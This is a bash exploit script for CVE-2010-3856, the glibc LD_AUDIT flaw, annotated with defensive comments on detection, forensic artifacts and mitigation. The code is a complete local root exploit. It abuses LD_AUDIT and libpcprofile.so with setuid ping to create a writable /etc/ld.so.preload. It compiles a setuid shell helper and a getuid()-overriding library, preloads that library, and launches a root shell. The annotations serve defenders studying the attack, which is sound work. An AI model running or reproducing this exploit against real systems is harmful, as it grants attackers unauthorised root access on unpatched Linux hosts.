#!/bin/bash
# CVE-2010-3856
# Author: deadbyte
 
# /etc/ld.so.preload is the system-wide preload list read by the dynamic
# loader: every library path listed in it is loaded into dynamically linked
# programs, setuid ones included. Only root should be able to create or
# modify it, so any unexpected change to this file is worth an alert
# (file-integrity monitoring, or an auditd watch such as
# `-w /etc/ld.so.preload -p wa`).
OUTPUT=/etc/ld.so.preload
 
# Probe step. The caller's umask is saved and then cleared, so a file created
# by the next command gets its permission bits unmasked.
MASK=`umask`
umask 0
# ping is started with LD_AUDIT naming libpcprofile.so and PCPROFILE_OUTPUT
# naming $OUTPUT. CVE-2010-3856 is the glibc loader honouring LD_AUDIT for
# privileged programs; ping is presumably used because it is installed setuid
# root on the affected systems (not shown here, so confirm per host). On a
# patched glibc the variable is ignored for such programs and nothing is
# written. ping's stderr is discarded.
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="$OUTPUT" ping 2> /dev/null
# The only test made is "does $OUTPUT exist as a regular file now". This is
# not a reliable patch-level check: a host that already had the file before
# the run passes it too. Note the script also exits 0 on the "not vulnerable"
# path, so the exit status cannot be used to tell the two outcomes apart.
if [ ! -f $OUTPUT ]; then
  echo "System does not appear to be vulnerable"
  exit 0
fi
# Truncates the file as the calling user. That can only succeed if the file
# is writable by that user, so a world-writable /etc/ld.so.preload is itself
# an indicator of compromise. Any legitimate entries that were in the file
# are lost at this point.
echo -n > $OUTPUT
# Restore the umask saved above.
umask $MASK
 
# Writes a small C helper to ./sh.c and compiles it to ./sh in the current
# directory. The helper sets the real uid and gid to the process's effective
# ones and then execs /bin/bash with the inherited environment; the return
# values of setuid() and setgid() are not checked. On its own the binary
# grants nothing: it only matters once it is owned by root with the setuid
# bit set, which the library built further down arranges.
# Forensic artifacts from this step: sh.c and sh in the working directory.
cat > sh.c << EOF
#include <unistd.h>
#include <stdio.h>
int main (int argc, char **argv, char **envp)
{
  char *args[] = { "/bin/bash", NULL };
  setuid(geteuid());
  setgid(getegid());
  execve(args[0], args, envp);
  perror("execve failed");
  return 0;
}
EOF
gcc sh.c -o sh
 
# Writes ./libpwn.c and builds it into the shared object ./libpwn.so.
# The heredoc delimiter is unquoted, so $PWD is expanded by the shell when
# the file is written: the generated C source contains the absolute path of
# the directory the script was run from.
# The library defines its own getuid(). When that replacement is called it
# chowns <cwd>/sh to uid 0 / gid 0, sets its mode to setuid + rwxr-xr-x
# (04755), and returns 0. Those calls only take effect if the calling process
# is already running with root privileges.
# Forensic artifacts from this step: libpwn.c, libpwn.o and libpwn.so in the
# working directory.
cat > libpwn.c << EOF
#include <sys/stat.h>
#include <unistd.h>
uid_t getuid (void)
{
  chown("$PWD/sh", 0, 0);
  chmod("$PWD/sh", S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S_IROTH|S_IXOTH);
  return 0;
}
EOF
gcc -Wall -fPIC -c libpwn.c
gcc -shared -Wl,-soname,libpwn.so -o libpwn.so libpwn.o
 
# Final stage. The absolute path of libpwn.so is written into the preload
# list, ping is run once more so that the preloaded getuid() replacement
# executes inside it (presumably with root privileges, ping being setuid on
# the affected systems), the list is truncated again, and the helper ./sh is
# started.
# What this leaves behind for detection and response:
#   - /etc/ld.so.preload is never removed, only emptied, so an empty file
#     writable by non-root users remains after the run;
#   - while the entry is present, the preload list points into a
#     user-writable directory, which legitimate configurations do not do;
#   - a root-owned setuid binary named sh appears outside package-managed
#     paths (a sweep such as `find / -xdev -perm -4000 -user root` compared
#     against a known-good baseline shows it).
# Mitigation: install the vendor's fixed glibc. Mounting user-writable
# filesystems nosuid keeps the setuid bit on ./sh from being honoured, but
# does not stop the write to the preload file itself.
echo "$PWD/libpwn.so" > $OUTPUT
ping 2> /dev/null
echo -n > $OUTPUT
./sh
